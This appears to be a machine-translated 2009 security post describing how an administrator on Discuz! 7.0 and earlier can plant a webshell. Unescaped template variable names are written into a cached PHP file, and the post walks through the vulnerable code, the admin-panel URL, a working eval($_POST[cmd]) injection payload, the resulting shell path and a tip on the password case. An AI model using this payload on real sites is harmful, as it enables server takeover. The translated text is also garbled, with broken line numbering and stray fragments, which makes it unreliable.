Discuz! 7.0 and below the version background get a webshell without founder-vulnerability warning-the black bar safety net

ID MYHACK58:62200923893
Type myhack58
Reporter 佚名
Modified 2009-07-15T00:00:00


Author: oldjun

I rarely care about such vulnerability, it has been rarely take the stand, and encounters a DZ more just passing through, also did not go too much care about the DZ's vulnerability or to study the code; shortly before the Forum is left a shell, I check half a day, but since met, it out convenient for everyone.

I declare that: 1. This is not my debut, a lot of beef long ago found out, but nobody posted ring04h cow that seems to have one:<http://ring04h.googlepages.com/dzshell.txt>estimated know a lot of people, I study less, know late, ashamed ashamed; 2. I From The take the to shell the IIS logs to know here can be used, i.e. the styles. inc. php this file, then looked down to find use way. Later the flyh4t reminder, actually with ring04h of that method as I'm falling behind...

Well, not nonsense, see the code:

PHP code

  1. <? php
  2. ......
  3. if($newcvar && $newcsubst) {
  4. if($db->result_first("SELECT COUNT(*) FROM {$tablepre}stylevars WHERE variable='$newcvar' AND styleid='$id'")) {
  5. cpmsg('styles_edit_variable_duplicate', ", 'error');
  6. } elseif(! preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar)) {
  7. cpmsg('styles_edit_variable_illegal', ", 'error');
  8. }
  9. $newcvar = via strtolower($newcvar); 1 0. $db->query("INSERT INTO {$tablepre}stylevars (styleid, variable, substitute) 1 1. VALUES ('$id', '$newcvar', '$newcsubst')"); 1 2. }//Insert the variable data From www.oldjun.com 1 3. ...... 1 4. updatecache('styles');//update the cache, write files, From www.oldjun.com 1 5. ...... 1 6. ?& gt;

This is a style to increase the variable code, The variable name and the value of the variable stored in the database, although the post over the data daddslashes, but into the library after another are pure data.

Here relates to a regular question, determine the variable names:! preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]* /", $newcvar), where“\x7f-\xff”refers to the ASCII code value 1 2 7 to 2 5 5 between the characters, which is often used as a Chinese character the first byte there, so you can use it as a Chinese match of the signs. So this match seems to only allow letters or Chinese made variable names, no other big matches, just tested the following, the General case this regularization is equal to the dummy of:

PHP code

  1. <? php
  2. $newcvar=$_GET['newcvar'];
  3. echo $newcvar;
  4. echo "<br>";
  5. if(! preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar)) {
  6. echo "haha";
  7. }else{
  8. echo 'pass';
  9. } 1 0. ?& gt;

The following look at the updatecache function, in the include in the cache. func. php file, the first removed from the database, after some processing a final write to a file, specifically I do not describe, I only talk about focus, look at the function:

PHP code

  1. function getcachevars($data, $type = 'VAR') {
  2. $evaluate = ";
  3. foreach($data as $key => $val) {
  4. if(is_array($val)) {
  5. $evaluate .= "\$$key = ". arrayeval($val).";\ n";
  6. } else {
  7. $val = addcslashes($val, '\'\\');
  8. $evaluate .= $type == 'VAR' ? "\$$key = '$val';\n" : "define('". strtoupper($key)."', '$val');\n";
  9. } 1 0. } 1 1. return $evaluate; 1 2. }

What also not say, the processed value is not processed key, and this key is before we commit, clean the presence of database values. About the array key, we can refer to under the Phantom brigade of the third period theadvanced PHP code auditing techniques on that article much better place to talk about key issues, the dz here but they ignore...

So you can directly take the shell, using the method Forum address into their own, first with the administrator account login background, without the forum founder and administrator level can be: http://www.oldjun.com/bbs/admincp.php?action=styles&operation=edit&id=1&adv=1 In the following there is a“custom template variables”, the variable in the fill:

PHP code

  1. OLDJUN', '#9 9 9');eval($_POST[cmd]);//

Replace the contents of whatever the input: 1 1 1 1, and then submit, the word Trojan is generated: http://www.oldjun.com/bbs/forumdata/cache/style_1.php

If you modify the style of the id is 2, then the 对于 的 shell 就是 style_2.php the.

This style of template can be imported exported, so with ring04h that dzshell, and took the trouble you can directly use that import style get shell.

Note: a lot of people reacted on the word, I found that my article is less to say one thing:

PHP code

  1. $evaluate .= $type == 'VAR' ? "\$$key = '$val';\n" : "define('". strtoupper($key)."', '$val');\n";

This sentence is to say that all the variable names into uppercase!

Therefore please use uppercase CMD As you word password!